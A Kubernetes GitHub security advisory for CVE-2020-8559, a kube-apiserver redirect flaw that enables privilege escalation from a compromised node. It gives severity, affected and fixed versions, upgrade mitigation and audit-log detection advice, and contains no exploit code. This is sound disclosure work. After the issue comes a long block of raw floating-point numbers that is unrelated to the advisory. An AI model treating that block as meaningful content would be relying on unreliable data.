This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2020-8559: Privilege escalation from compromised node to cluster Issue date: --- start body --- CVSS Rating: Medium (6.4) [CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H) If an attacker is able to intercept certain requests to the Kubelet, they can send a redirect response that may be followed by a client using the credentials from the original request. This can lead to compromise of other nodes. If multiple clusters share the same certificate authority trusted by the client, and the same authentication credentials, this vulnerability may allow an attacker to redirect the client to another cluster. In this configuration, this vulnerability should be considered **High** severity. ### Am I vulnerable? You are only affected by this vulnerability if you treat the node as a security boundary, or if clusters share certificate authorities and authentication credentials. Note that this vulnerability requires an attacker to first compromise a node through separate means. #### Affected Versions - kube-apiserver v1.18.0-1.18.5 - kube-apiserver v1.17.0-1.17.8 - kube-apiserver v1.16.0-1.16.12 - all kube-apiserver versions prior to v1.16.0 ### How do I mitigate this vulnerability? To mitigate this vulnerability you must upgrade the kube-apiserver to a patched version. #### Fixed Versions - kube-apiserver master - fixed by https://github.com/kubernetes/kubernetes/pull/92941 - kube-apiserver v1.18.6 - fixed by https://github.com/kubernetes/kubernetes/pull/92969 - kube-apiserver v1.17.9 - fixed by https://github.com/kubernetes/kubernetes/pull/92970 - kube-apiserver v1.16.13 - fixed by https://github.com/kubernetes/kubernetes/pull/92971 **Fix impact:** Proxied backends (such as an extension API server) that respond to upgrade requests with a non-101 response code may be broken by this patch. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ### Detection Upgrade requests should never respond with a redirect. If any of the following requests have a response code in the 300-399 range, it may be evidence of exploitation. This information can be found in the Kubernetes audit logs. - pods/exec - pods/attach - pods/portforward - any resource: proxy If you find evidence that this vulnerability has been exploited, please contact [email protected] #### Acknowledgements This vulnerability was reported by Wouter ter Maat of Offensi, via the Kubernetes bug bounty. /area security /kind bug /committee product-security /sig api-machinery /area apiserver --- end body ---
2,799
[ -0.022712280973792076, -0.027046170085668564, -0.00010369165829615667, -0.012588590383529663, 0.03979050740599632, -0.035835836082696915, 0.005969253368675709, 0.033452197909355164, 0.003001556033268571, 0.018703434616327286, -0.019949428737163544, -0.022089285776019096, -0.021791329607367516, 0.006378941237926483, 0.003111596219241619, 0.07405531406402588, -0.013495998457074165, -0.025705372914671898, 0.011715040542185307, 0.0229966938495636, -0.015168608166277409, -0.021236050873994827, -0.03136651590466499, 0.05655723810195923, -0.0004448160470928997, 0.010401330888271332, -0.004235698375850916, 0.023944731801748276, -0.0509231835603714, 0.009385576471686363, 0.013854898512363434, 0.017538702115416527, -0.001450836774893105, 0.012900087982416153, 0.03911333903670311, -0.004516724031418562, 0.018459653481841087, 0.03299172222614288, -0.03456275537610054, -0.03356054425239563, -0.04157823696732521, -0.06392484903335571, 0.018689891323447227, 0.003109903307631612, -0.004763890989124775, 0.010922752320766449, 0.006720912177115679, -0.040901068598032, -0.0020196596160531044, 0.03169155493378639, -0.01272402424365282, -0.03488779813051224, -0.03756939247250557, -0.05563628673553467, 0.01752515882253647, -0.0052379099652171135, 0.02368740737438202, 0.009581955149769783, 0.009839280508458614, -0.009934083558619022, 0.014897739514708519, 0.03155612200498581, 0.011444172821938992, 0.028197359293699265, 0.010543536394834518, 0.029903827235102654, -0.02112770453095436, -0.004499794449657202, -0.029903827235102654, 0.0009378804243169725, -0.003971601836383343, 0.003937743604183197, 0.01621145009994507, -0.020694315433502197, 0.04729355126619339, -0.016252079978585243, 0.028793267905712128, 0.04044059291481972, -0.038598690181970596, -0.01619790680706501, -0.03380432724952698, 0.04182201996445656, -0.023660318925976753, 0.010963382199406624, 0.04472030699253082, -0.0376235656440258, -0.02322693169116974, -0.07405531406402588, -0.002182180294767022, -0.01805335283279419, -0.018730521202087402, 0.004523495677858591, -0.02490631304681301, -0.03277502954006195, 0.023091496899724007, -0.004167981445789337, -0.016996966674923897, -0.029497524723410606, -0.059753481298685074, 0.0028017908334732056, -0.03326259180903435, -0.0007952515152283013, -0.008010921068489552, 0.020152579993009567, 0.0657125785946846, 0.0036025443114340305, 0.013624660670757294, 0.01644168794155121, -0.024960486218333244, 0.12438258528709412, 0.03927585855126381, -0.007320207543671131, -0.03342511132359505, -0.0024344262201339006, -0.024093708023428917, 0.01882532611489296, -0.006747999228537083, -0.020003601908683777, -0.04683307558298111, -0.02631482668220997, -0.013509541749954224, -0.02058596722781658, 0.016238536685705185, -0.017308464273810387, -0.029578786343336105, -0.0007478496409021318, 0.0031877777073532343, 0.023728037253022194, -0.02198093757033348, -0.0042966436594724655, 0.00040524391806684434, 0.01744389906525612, -0.029280830174684525, -0.00215001474134624, 0.018107526004314423, 0.03331676498055458, 0.0010851649567484856, 0.03954672813415527, -0.01920454017817974, -0.006226578261703253, -0.008105725049972534, -0.03540244698524475, 0.0051058619283139706, 0.02498757280409336, 0.011633780784904957, 0.009053763002157211, 0.017714766785502434, -0.0025089147966355085, -0.02922665700316429, 0.005718700587749481, 0.003001556033268571, -0.0007749364012852311, 0.029876740649342537, 0.020694315433502197, 0.06674187630414963, -0.017376182600855827, -0.0016616059001535177, 0.012331265956163406, -0.0075165871530771255, 0.006676896009594202, 0.0167531855404377, -0.03215203061699867, -0.009351717308163643, -0.009818964637815952, 0.02483859471976757, 0.017145944759249687, 0.0019316273974254727, -0.01752515882253647, -0.03670261427760124, 0.03155612200498581, 0.010658655315637589, -0.034210629761219025, 0.018527371808886528, -0.008275017142295837, -0.040901068598032, 0.00036207432276569307, 0.01990879699587822, 0.0217642430216074, 0.022576848044991493, -0.012696937657892704, -0.01056385226547718, 0.02105998620390892, -0.043230533599853516, 0.01180984452366829, 0.043934788554906845, -0.035077404230833054, -0.008809981867671013, 0.03171864151954651, 0.0017039290396496654, -0.01921808533370495, -0.002625726629048586, -0.0028204130940139294, 0.028657834976911545, -0.020450534299016, -0.046941425651311874, 0.020477620884776115, -0.01113944686949253, -0.026815932244062424, 0.07443452626466751, -0.026355456560850143, 0.011897876858711243, 0.005904922261834145, -0.03377724066376686, 0.0032148645259439945, -0.025271983817219734, 0.019312888383865356, 0.001965485978871584, -0.010286211967468262, -0.0031826989725232124, -0.02089746668934822, -0.04959592968225479, -0.045559998601675034, 0.02307795360684395, -0.01627916656434536, 0.045018263161182404, 0.0040494767017662525, -0.00545799033716321, 0.011999452486634254, -0.03919459879398346, 0.025515764951705933, 0.03743395581841469, -0.010347157716751099, 0.014220570214092731, 0.007740052882581949, -0.03943838179111481, 0.00140258832834661, 0.023105040192604065, -0.03561914339661598, 0.014532067812979221, -0.029795479029417038, -0.006974850781261921, -0.025285527110099792, 0.008335962891578674, 0.01238543912768364, -0.004269556608051062, -0.018635718151926994, 0.005915079731494188, -0.009385576471686363, 0.0067886291071772575, 0.009493923746049404, 0.016170820221304893, -0.005193893797695637, -0.023728037253022194, -0.01935351826250553, -0.011186848394572735, 0.03919459879398346, -0.03905916586518288, 0.055582113564014435, -0.023267561569809914, 0.026260651648044586, -0.0376235656440258, 0.030906038358807564, -0.0032775027211755514, 0.0018994618440046906, 0.017701223492622375, -0.03616087883710861, -0.030824778601527214, 0.023728037253022194, 0.005664526950567961, -0.0165094044059515, 0.03635048493742943, 0.00744209811091423, -0.012250005267560482, 0.02536678873002529, 0.019570212811231613, -0.029118310660123825, -0.014857109636068344, 0.01260890532284975, 0.005190507974475622, -0.04428691789507866, 0.027791056782007217, -0.015778061002492905, -0.02158818021416664, -0.03117690607905388, -0.007489500101655722, -0.015141521580517292, 0.027736883610486984, 0.01797209121286869, -0.011403542943298817, -0.01680735871195793, 0.027818143367767334, -0.028034837916493416, -0.00964290089905262, 0.01044873334467411, -0.012744339182972908, 0.016726098954677582, -0.006026812829077244, -0.0662001371383667, -0.004533653147518635, 0.010665427893400192, -0.02984965406358242, -0.003226715140044689, 0.011200391687452793, -0.006409414112567902, 0.010049202479422092, 0.027100343257188797, -0.02353842929005623, 0.04742898792028427, -0.0015769596211612225, -0.009697074070572853, -0.008268245495855808, 0.013015206903219223, 0.002684979001060128, 0.04425983130931854, -0.004868852440267801, 0.023240474984049797, -0.003693962236866355, 0.035077404230833054, -0.02236015349626541, 0.012202603742480278, 0.01673964224755764, -0.022509131580591202, 0.0075165871530771255, -0.022333066910505295, 0.0053530288860201836, 0.01400387566536665, 0.020924553275108337, -0.04157823696732521, -0.013644975610077381, 0.008776122704148293, 0.024093708023428917, 0.004496408626437187, -0.026192935183644295, 0.02114124782383442, 0.02189967781305313, -0.03672970086336136, -0.008241158910095692, 0.0026104904245585203, -0.07015480846166611, -0.012338037602603436, -0.01688862033188343, 0.0021838732063770294, -0.03480653837323189, -0.02391764335334301, -0.03442732244729996, -0.026098132133483887, -0.041307371109724045, 0.010618025436997414, 0.03364180400967598, 0.018297133967280388, -0.001361111644655466, -0.029985086992383003, 0.003368920646607876, 0.01805335283279419, 0.007076426409184933, -0.02475733496248722, -0.0061453175731003284, -0.018608631566166878, 0.042174145579338074, -0.029714219272136688, 0.0007740899454802275, 0.018852412700653076, -0.004479479510337114, 0.0014948527095839381, 0.040738545358181, -0.007299892604351044, -0.016306253150105476, -0.019854623824357986, 0.025434505194425583, -0.04195745289325714, 0.057207319885492325, -0.046399686485528946, -0.0003197512123733759, 0.023321734741330147, -0.013407966122031212, -0.022847715765237808, -0.019096193835139275, 0.012256776914000511, -0.02909122221171856, 0.00047782808542251587, -0.045478735119104385, -0.005779645871371031, 0.03017469495534897, 0.027587905526161194, -0.011965594254434109, -0.02598978392779827, -0.02984965406358242, 0.02097872644662857, -0.029199570417404175, 0.03152903541922569, -0.014220570214092731, -0.002530922880396247, 0.008762579411268234, -0.00941266305744648, 0.023728037253022194, 0.03897790610790253, 0.0382736474275589, 0.024472923949360847, 0.002111077541485429, 0.009026676416397095, -0.04667055606842041, 0.06787952035665512, -0.015520736575126648, -0.023714493960142136, -0.027113886550068855, -0.006995166186243296, -0.013746551238000393, -0.013326705433428288, 0.03635048493742943, -0.008105725049972534, 0.015940582379698753, 0.027587905526161194, 0.0007563142571598291, 0.03161029517650604, -0.0003045148914679885, 0.007435326464474201, -0.012994891963899136, -0.030499735847115517, 0.0005497774109244347, -0.03442732244729996, -0.004418534226715565, -0.007699423003941774, -0.043772269040346146, 0.012432841584086418, 0.022333066910505295, 0.09567057341337204, 0.05829079449176788, 0.020274469628930092, 0.011125902645289898, 0.04133445769548416, 0.01944832317531109, -0.005430903285741806, 0.04190327972173691, 0.01644168794155121, 0.002385331317782402, 0.02900996245443821, 0.019868167117238045, 0.04621008038520813, 0.047022685408592224, -0.007083198055624962, -0.014559155330061913, -0.008153126575052738, 0.002431040396913886, -0.008925100788474083, -0.04244501516222954, 0.0006521993782371283, 0.005982797127217054, -0.06533335894346237, 0.013712692074477673, -0.001427982235327363, -0.05447155609726906, 0.0014068207237869501, -0.02559702657163143, 0.02183196134865284, -0.02191322110593319, -0.020734945312142372, -0.009798649698495865, -0.007780683226883411, -0.021642353385686874, -0.043095096945762634, -0.05238587036728859, 0.010001800954341888, -0.007780683226883411, -0.0028017908334732056, -0.02868492156267166, -0.0051803505048155785, -0.00412396527826786, -0.03247707337141037, 0.038219474256038666, 0.012412525713443756, -0.004713103175163269, 0.0060945297591388226, -0.017308464273810387, -0.0029660046566277742, -0.006240121554583311, -0.0057322438806295395, -0.012473471462726593, -0.042472101747989655, 0.01789083145558834, 0.006334925536066294, 0.04927089065313339, 0.04672472923994064, 0.023700950667262077, 0.011586378328502178, -0.007279577665030956, 0.0402509830892086, 0.017850201576948166, -0.008444310165941715, -0.009162110276520252, 0.029037049040198326, -0.0120333107188344, 0.02345716953277588, 0.02076203189790249, -0.00952778197824955, 0.017091771587729454, -0.028061924502253532, -0.0062367357313632965, 0.010611253790557384, -0.05563628673553467, -0.035917095839977264, 0.03190825134515762, -0.03933003172278404, -0.00040101160993799567, -0.048783328384160995, 0.013089695945382118, -0.008803210221230984, -0.005942166782915592, 0.0001479193160776049, 0.07595138996839523, 0.019610842689871788, 0.005369958002120256, 0.0002968967310152948, 0.009480379521846771, -0.02282062917947769, -0.01454561110585928, -0.016929250210523605, -0.023484256118535995, 0.04420565813779831, -0.008451081812381744, 0.016550034284591675, -0.01260890532284975, -0.01572388783097267, 0.008857383392751217, -0.015561366453766823, -0.012791741639375687, -0.0006674356991425157, 0.022319523617625237, -0.013103239238262177, 0.005921851843595505, 0.014613328501582146, -0.01191819179803133, -0.024554183706641197, 0.011092044413089752, -0.021506918594241142, -0.008572972379624844, -0.00412396527826786, 0.026490889489650726, 0.008349506184458733, -0.013401194475591183, -0.02221117541193962, 0.04574960470199585, -0.01306938100606203, -0.042174145579338074, 0.004851922858506441, -0.0046758586540818214, 0.01913682371377945, -0.017389725893735886, -0.022184088826179504, -0.004682630300521851, 0.016956336796283722, 0.004730032291263342, 0.025190724059939384, -0.04992097243666649, -0.013556943275034428, -0.030526824295520782, 0.04824158921837807, -0.011213934980332851, -0.004256013315171003, 0.021317310631275177, -0.048322852700948715, 0.018419023603200912, -0.004398219287395477, 0.0229966938495636, 0.021493375301361084, -0.007990606129169464, -0.017836658284068108, 0.02676175907254219, 0.023795753717422485, 0.02808901108801365, -0.022021567448973656, -0.0043542031198740005, -0.014030962251126766, 0.004828222095966339, -0.04171367362141609, 0.0012959340820088983, -0.013103239238262177, -0.016008298844099045, 0.015642626211047173, -0.014125766232609749, -0.002117849187925458, 0.033993933349847794, -0.01990879699587822, 0.020030688494443893, -0.014274743385612965, -0.011180076748132706, 0.033750154078006744, 0.008545885793864727, -0.002588482340797782, -0.00607760064303875, 0.003346912795677781, 0.018947215750813484, 0.006111459340900183, -0.003155612153932452, 0.004374518059194088, 0.02722223475575447, 0.005420745816081762, 0.00005078774847788736, 0.015222781337797642, 0.014166396111249924, -0.014613328501582146, 0.0014322145143523812, 0.009913768619298935, -0.0018452882068231702, -0.01596766896545887, 0.025420961901545525, 0.006500831805169582, -0.0005899843527004123, -0.004127351101487875, 0.009913768619298935, -0.004323730245232582, 0.01103109959512949, -0.0042966436594724655, 0.022184088826179504, -0.0229154322296381, 0.011207163333892822, 0.038598690181970596, -0.013665290549397469, 0.01454561110585928, -0.027506645768880844, 0.02615230530500412, -0.009209511801600456, 0.011627009138464928, 0.009080849587917328, -0.023037323728203773, 0.023565515875816345, -0.00779422651976347, 0.015263412147760391, 0.01812106929719448, 0.011051414534449577, 0.0009124865755438805, -0.010699286125600338, -0.010441961698234081, 0.021804874762892723, -0.005959095899015665, 0.008769351057708263, -0.013678833842277527, 0.014830023050308228, 0.011945278383791447, -0.006917291320860386, 0.022427869960665703, -0.010787318460643291, -0.01667192578315735, -0.0052616107277572155, -0.029714219272136688, -0.03326259180903435, 0.016089558601379395, -0.002155093476176262, -0.005908308085054159, -0.03477945178747177, 0.0064500439912080765, 0.004726646468043327, 0.01122070662677288, -0.011078501120209694, 0.06500831991434097, -0.02166943997144699, -0.0035890010185539722, -0.009690302424132824, 0.023809297010302544, 0.012324494309723377, 0.022956062108278275, -0.011234249919652939, -0.0014406791888177395, -0.014085136353969574, 0.03190825134515762, 0.01400387566536665, -0.0202067531645298, 0.02199448086321354, 0.020409904420375824, -0.022075742483139038, -0.028278619050979614, -0.0016412907280027866, -0.027818143367767334, -0.004283100366592407, -0.003727820934727788, 0.0021855661179870367, -0.013360563665628433, 0.0026172620709985495, 0.004929797723889351, 0.020017145201563835, 0.044611960649490356, -0.020856836810708046, -0.0038192388601601124, -0.01673964224755764, 0.014897739514708519, 0.007225404027849436, -0.010868578217923641, -0.0028728938195854425, 0.010516449809074402, -0.0016395978163927794, -0.003968216013163328, 0.003396007465198636, -0.006141931749880314, -0.023470712825655937, 0.03147486224770546, -0.01904202066361904, 0.012629220262169838, -0.004923026077449322, -0.0384361706674099, 0.0026291124522686005, 0.0033875429071485996, 0.02204865589737892, -0.003985145594924688, 0.0280077513307333, -0.020816205069422722, 0.008843840099871159, -0.03897790610790253, 0.007943203672766685, -0.011599921621382236, -0.002881358377635479, -0.007354066241532564, -0.017647050321102142, 0.010658655315637589, -0.01713240146636963, 0.05271091312170029, -0.005410588346421719, 0.03136651590466499, 0.0008727028616704047, 0.020017145201563835, 0.005217595025897026, 0.01603538542985916, -0.023741580545902252, -0.016143733635544777, -0.016238536685705185, 0.05162744224071503, 0.0015634162118658423, -0.0039038851391524076, 0.0034112439025193453, -0.0015498728025704622, -0.035294100642204285, 0.012879773043096066, -0.006683667656034231, -0.0038192388601601124, -0.0307164303958416, -0.025732459500432014, -0.030201781541109085, 0.01729492098093033, 0.001052152831107378, -0.006934220902621746, -0.007286349311470985, 0.013644975610077381, 0.00813281163573265, -0.022495586425065994, 0.011721812188625336, 0.01705113984644413, 0.0010860114125534892, 0.03808404132723808, 0.012331265956163406, -0.019935885444283485, 0.03472527861595154, -0.007509815040975809, 0.020721402019262314, -0.006273979786783457, 0.056286368519067764, -0.044774480164051056, 0.03756939247250557, -0.0030438790563493967, 0.003484039567410946, 0.0054850769229233265, -0.00952101033180952, 0.027371210977435112, 0.025637656450271606, -0.005376729648560286, -0.02212991565465927, -0.03924877196550369, -0.0012129807146266103, -0.018107526004314423, 0.008058322593569756, 0.01156606338918209, 0.020030688494443893, 0.011992680840194225, 0.007848400622606277, 0.02613876201212406, 0.003815853036940098, 0.02105998620390892, 0.012933947145938873, -0.018838869407773018, -0.00613177428022027, -0.023579059168696404, -0.003091281047090888, -0.012195832096040249, -0.025786632671952248, 0.0009471915545873344, 0.0037007341161370277, 0.004171367269009352, -0.0027171445544809103, -0.012053625658154488, 0.00290167354978621, -0.0006801325944252312, 0.005190507974475622, 0.031203992664813995, -0.042174145579338074, 0.003859868971630931, 0.006466973572969437, 0.00825470220297575, -0.023782210424542427, 0.0014796163886785507, 0.01775539666414261, -0.03188116475939751, 0.015927039086818695, 0.042715884745121, -0.01588640734553337, 0.00047782808542251587, 0.03342511132359505, -0.025515764951705933, 0.026043958961963654, -0.028278619050979614, -0.003849711501970887, -0.01122747827321291, -0.01958375610411167, -0.02383638359606266, 0.016522947698831558, 0.00006311436300165951, -0.014220570214092731, 0.002461513038724661, 0.0071780020371079445, 0.0026172620709985495, -0.014017418958246708, -0.0035077405627816916, -0.02723577804863453, 0.003404472256079316, -0.0006488134968094528, 0.0006238428759388626, -0.012101028114557266, 0.02608458884060383, -0.009107936173677444, -0.005430903285741806, 0.003401086200028658, 0.008363049477338791, 0.011308738961815834, 0.016563577577471733, 0.009493923746049404, -0.013001663610339165, -0.008559429086744785, 0.00563405454158783, 0.001255303854122758, -0.013103239238262177, -0.03307298198342323, -0.0036465604789555073, 0.0404135063290596, 0.00975124817341566, 0.028197359293699265, -0.0037819943390786648, -0.009514238685369492, 0.015940582379698753, -0.023700950667262077, 0.007828084751963615, 0.010428418405354023, -0.03163738176226616, -0.015696801245212555, 0.016996966674923897, 0.027872316539287567, 0.001275619026273489, 0.0036025443114340305, -0.0017149329651147127, -0.00464538624510169, -0.01488419622182846, -0.040007203817367554, -0.013963245786726475, 0.015100890770554543, 0.010841491632163525, 0.005258224904537201, -0.02337590791285038, -0.01611664518713951, 0.0088302968069911, 0.004042705055326223, -0.014396633952856064, 0.010597710497677326, -0.013292847201228142, 0.00568822817876935, -0.00883706845343113, -0.004100264515727758, 0.008566200733184814, -0.003693962236866355, 0.004154438152909279, 0.03063517063856125, 0.015060260891914368, 0.011119130998849869, -0.011410314589738846, -0.03431897610425949, -0.009446521289646626, -0.02968713268637657, 0.01319804321974516, -0.01874406635761261, 0.005647597834467888, -0.003409550990909338, -0.006141931749880314, -0.004110421985387802, -0.0022312751971185207, -0.013001663610339165, -0.01065188366919756, -0.01492482703179121, 0.003568685846403241, -0.0061216168105602264, 0.03244998678565025, 0.027587905526161194, -0.004750347696244717, -0.0008147201733663678, -0.013739779591560364, 0.004235698375850916, -0.008464625105261803, -0.03263959288597107, -0.009690302424132824, -0.025651199743151665, -0.0107602309435606, 0.019001390784978867, 0.007218632381409407, 0.011288424022495747, -0.012710480950772762, -0.031285252422094345, 0.016631295904517174, 0.012310950085520744, 0.0062367357313632965, -0.00508893234655261, 0.0007478496409021318, 0.007509815040975809, 0.0005688227829523385, 0.03377724066376686, -0.017999177798628807, 0.015425932593643665, -0.006189333740621805, 0.01820232905447483, -0.03987177088856697, -0.03155612200498581, -0.02005777508020401, -0.020152579993009567, 0.007543673738837242, -0.02892870269715786, -0.013678833842277527, 0.0007415011641569436, 0.0006327307200990617, -0.0113764563575387, 0.02846822701394558, -0.037758998572826385, 0.025637656450271606, -0.006141931749880314, -0.026734670624136925, -0.0010098298080265522, 0.009331402368843555, -0.008363049477338791, -0.01611664518713951, -0.0005853287875652313, -0.009812192991375923, -0.020504707470536232, 0.01538530271500349, -0.020640142261981964, -0.019922342151403427, -0.008796438574790955, 0.023037323728203773, 0.011241021566092968, -0.03903207927942276, -0.004730032291263342, -0.004167981445789337, 0.02183196134865284, -0.02475733496248722, 0.020464077591896057, 0.03505031764507294, 0.03556496649980545, -0.016956336796283722, 0.004195068031549454, 0.01967856101691723, -0.03063517063856125, -0.003971601836383343, 0.0038124669808894396, 0.00952101033180952, 0.009148566983640194, -0.016401058062911034, -0.0382736474275589, -0.009107936173677444, -0.013123554177582264, -0.03001217357814312, -0.0022549761924892664, 0.007435326464474201, -0.0065177613869309425, 0.0021974167320877314, 0.0066735101863741875, 0.009507467038929462, -0.021886134520173073, -0.010922752320766449, 0.057803232222795486, -0.01680735871195793, -0.00642295740544796, 0.0034366378095000982, 0.006524533033370972, 0.017416812479496002, -0.002991398563608527, 0.007218632381409407, 0.028197359293699265, -0.022170545533299446, -0.0029863195959478617, -0.006737841293215752, -0.008220843970775604, -0.0006411953363567591, 0.0303101297467947, 0.007638477720320225, 0.0252178106456995, -0.001736941048875451, -0.013245444744825363, 0.024391664192080498, -0.02107352949678898, -0.018838869407773018, 0.01296103373169899, 0.0006047974457032979, 0.007347294595092535, -0.024364575743675232, -0.004201839677989483, -0.036377571523189545, 0.008891241624951363, -0.031962424516677856, -0.05336099490523338, -0.04081980884075165, -0.023091496899724007, 0.02822444587945938, 0.03402101993560791, 0.015642626211047173, 0.009365260601043701, 0.020017145201563835, 0.01798563450574875, -0.0176605936139822, -0.013590801507234573, -0.03995303064584732, -0.026504432782530785, 0.023186299949884415, 0.008505254983901978, -0.02452709712088108, 0.006277366075664759, -0.025028202682733536, 0.027046170085668564, 0.01307615265250206, -0.02483859471976757, 0.023118583485484123, -0.011132674291729927, -0.0025292299687862396, -0.012487014755606651, 0.022427869960665703, 0.0019045405788347125, 0.01812106929719448, -0.044693220406770706, 0.010191407985985279, 0.0028254918288439512, 0.01835130713880062, -0.01353662833571434, -0.008925100788474083, 0.0302288681268692, -0.030445562675595284, 0.006792014930397272, -0.014789393171668053, 0.018527371808886528, -0.015601996332406998, -0.04098232835531235, 0.01967856101691723, 0.015412389300763607, -0.0023108425084501505, -0.01261567696928978, -0.01114621851593256, -0.0039343577809631824, 0.00430002948269248, -0.004770662635564804, -0.017538702115416527, -0.02360614575445652, -0.04266171157360077, 0.038842469453811646, -0.010983697138726711, 0.008322419598698616, 0.002828877652063966, -0.017538702115416527, -0.004056248348206282, -0.00750304339453578, -0.014301829971373081, 0.009737704880535603, -0.011938506737351418, -0.023633232340216637, 0.0029236814007163048, -0.015574909746646881, -0.008613602258265018, -0.017633507028222084, -0.024351032450795174, -0.0019367061322554946, 0.0039919172413647175, 0.01767413690686226, -0.01099046878516674, 0.0017538702813908458, 0.006785243283957243, 0.010618025436997414, -0.0009632743312977254, 0.024581270292401314, -0.009317859075963497, 0.012737567536532879, 0.011945278383791447, -0.02575954608619213, -0.027899403125047684, -0.01966501586139202, -0.0017538702813908458, -0.0007783222827129066, 0.0008333423174917698, -0.032829202711582184, 0.0033401409164071083, -0.025651199743151665, 0.00493656937032938, 0.010191407985985279, 0.014681045897305012, -0.0215204618871212, 0.0018215873278677464, -0.009683530777692795, -0.027818143367767334, -0.008999588899314404, -0.002779782749712467, -0.0046860165894031525, 0.07611390948295593, -0.02005777508020401, 0.012927175499498844, 0.01866280473768711, 0.011159761808812618, -0.015642626211047173, 0.02468961849808693, 0.0022211174946278334, 0.0008663543849252164, -0.005661141127347946, 0.008227615617215633, -0.002385331317782402, 0.023281104862689972, 0.0036838047672063112, 0.001119023421779275, 0.01913682371377945, -0.00016876346489880234, -0.016644839197397232, 0.011769214645028114, 0.00567129859700799, -0.0005209976807236671, -0.006490674335509539, -0.011037871241569519, 0.011505118571221828, 0.00034408699139021337, -0.015033174306154251, -0.009419434703886509, -0.006910519674420357, 0.01492482703179121, -0.009866367094218731, 0.0006602407665923238, -0.016143733635544777, 0.009263685904443264, -0.019841080531477928, 0.013922614976763725, 0.03385850042104721, 0.0001403011556249112, -0.03415645286440849, 0.012778197415173054, -0.031501948833465576, -0.013793952763080597, 0.0011071729240939021, 0.00975124817341566, 0.029578786343336105, -0.0101033765822649, -0.019854623824357986, -0.021737156435847282, 0.01477584894746542, -0.005769488401710987, 0.0028593502938747406, -0.0006119923782534897, -0.021506918594241142, 0.0073676095344126225, 0.022969605401158333, -0.01611664518713951, 0.02868492156267166, 0.013976789079606533, -0.02166943997144699, -0.006297681014984846, 0.011742128059267998, -0.017010509967803955, -0.004682630300521851, -0.009114707820117474, -0.003169155679643154, -0.01133582554757595, 0.00813281163573265, -0.005092318169772625, -0.0024902927689254284, -0.02993091382086277, 0.02158818021416664, 0.0331813283264637, 0.008044779300689697, -0.00952778197824955, -0.010408102534711361, 0.0007393849664367735, 0.0018114297417923808, 0.0026545063592493534, 0.015304042026400566, 0.013367335312068462, -0.016861533746123314, 0.006439886521548033, -0.0059320093132555485, -0.02158818021416664, -0.00727280555292964, 0.001119023421779275, 0.026477346196770668, -0.021547548472881317, -0.007462413515895605, 0.0558529831469059, -0.0017657207790762186, 0.023416537791490555, 0.031203992664813995, -0.007042568176984787, 0.012866229750216007, 0.013590801507234573, 0.02097872644662857, 0.0060471282340586185, 0.018297133967280388, -0.04696851223707199, -0.02708679996430874, 0.009053763002157211, 0.004394833464175463, 0.014762305654585361, 0.027655621990561485, -0.00860005896538496, 0.008694862946867943, 0.02460835687816143, 0.012710480950772762, -0.0003506470820866525, 0.013834582641720772, -0.009669987484812737, -0.006734455469995737, 0.017105314880609512, -0.014748762361705303, -0.0017961934208869934, 0.01789083145558834, 0.02467607520520687, 0.028739094734191895, 0.014044505544006824, -0.006040356587618589, -0.014789393171668053, -0.006544847972691059, 0.016062472015619278, -0.005776260048151016, 0.030662257224321365, 0.019014934077858925, -0.012087484821677208, -0.011308738961815834, 0.01874406635761261, 0.014938370324671268, 0.01859508827328682, 0.01372623536735773, 0.01172858476638794, 0.012805284932255745, -0.00727280555292964, 0.005776260048151016, 0.002473363419994712, 0.026721127331256866, 0.012974577024579048, -0.0043542031198740005, -0.01898784749209881, 0.033912673592567444, -0.0037819943390786648, 0.013827810995280743, -0.006710754707455635, -0.013841354288160801, -0.012277091853320599, 0.027818143367767334, 0.03594418242573738, -0.003054036758840084, 0.00441514840349555, -0.025163637474179268, 0.01572388783097267, 0.020084861665964127, -0.015060260891914368, -0.004621685016900301, 0.014504981227219105, 0.0028695077635347843, 0.002437812043353915, 0.00999502930790186, 0.021100617945194244, 0.004256013315171003, -0.0064263432286679745, 0.023728037253022194, 0.005369958002120256, 0.018066896125674248, -0.014681045897305012, -0.028495313599705696, -0.0024259614292532206, -0.004895939026027918, 0.010834719985723495, -0.003440023632720113, -0.017619963735342026, 0.028116097673773766, -0.010272668674588203, 0.0035009689163416624, 0.004432077519595623, -0.004537038970738649, 0.03540244698524475, 0.0024598201271146536, -0.015019630081951618, 0.013157413341104984, -0.008552657440304756, 0.010590938851237297, 0.009019904769957066, -0.017091771587729454, -0.007977062836289406, 0.018419023603200912, -0.03626922518014908, -0.004408376757055521, -0.006995166186243296, 0.038598690181970596, -0.012182287871837616, -0.016631295904517174, 0.02922665700316429, 0.02838696539402008, -0.02708679996430874, -0.01867634803056717, 0.0038937274366617203, -0.010638340376317501, 0.006409414112567902, -0.030039260163903236, -0.010888893157243729, 0.008268245495855808, -0.013563714921474457, -0.022035112604498863, 0.007022252772003412, 0.0052954694256186485, -0.010597710497677326, 0.007936432026326656, 0.017633507028222084, -0.020003601908683777, -0.0005548561457544565, -0.010611253790557384, 0.024797964841127396, -0.0037887662183493376, -0.02030155621469021, -0.01928580179810524, 0.020396361127495766, -0.034996144473552704, 0.004218769259750843, 0.03077060543000698, -0.016929250210523605, 0.009311087429523468, 0.02005777508020401, 0.014965456910431385, 0.00971738900989294, -0.0101033765822649, 0.026247108355164528, 0.025488678365945816, 0.0017403268720954657, 0.014044505544006824, -0.010198180563747883, -0.009121479466557503, -0.004432077519595623, -0.0021720228251069784, 0.021168334409594536, 0.002014580648392439, -0.01958375610411167, 0.030445562675595284, 0.018242958933115005, 0.02607104554772377, -0.0045201098546385765, -0.0069206771440804005, -0.002182180294767022, -0.00019521541253197938, 0.017863744869828224, -0.008654232136905193, -0.012114571407437325, 0.007767139934003353, 0.007821313105523586, -0.010855034925043583, 0.034129366278648376, -0.029362091794610023, -0.007604619022458792, 0.04019680991768837, -0.02676175907254219, 0.03458984196186066, 0.023159213364124298, -0.025163637474179268, -0.0010487670078873634, -0.02390410006046295, 0.022333066910505295, -0.010848263278603554, -0.009148566983640194, 0.005911693908274174, -0.004022389650344849, -0.009236598387360573, 0.009568411856889725, 0.001485541695728898, 0.007015481125563383, -0.014532067812979221, 0.002290527569130063, -0.011369683779776096, -0.01376686617732048, 0.02298315055668354, 0.027506645768880844, -0.022874802350997925, 0.000710605236236006, -0.01659066416323185, 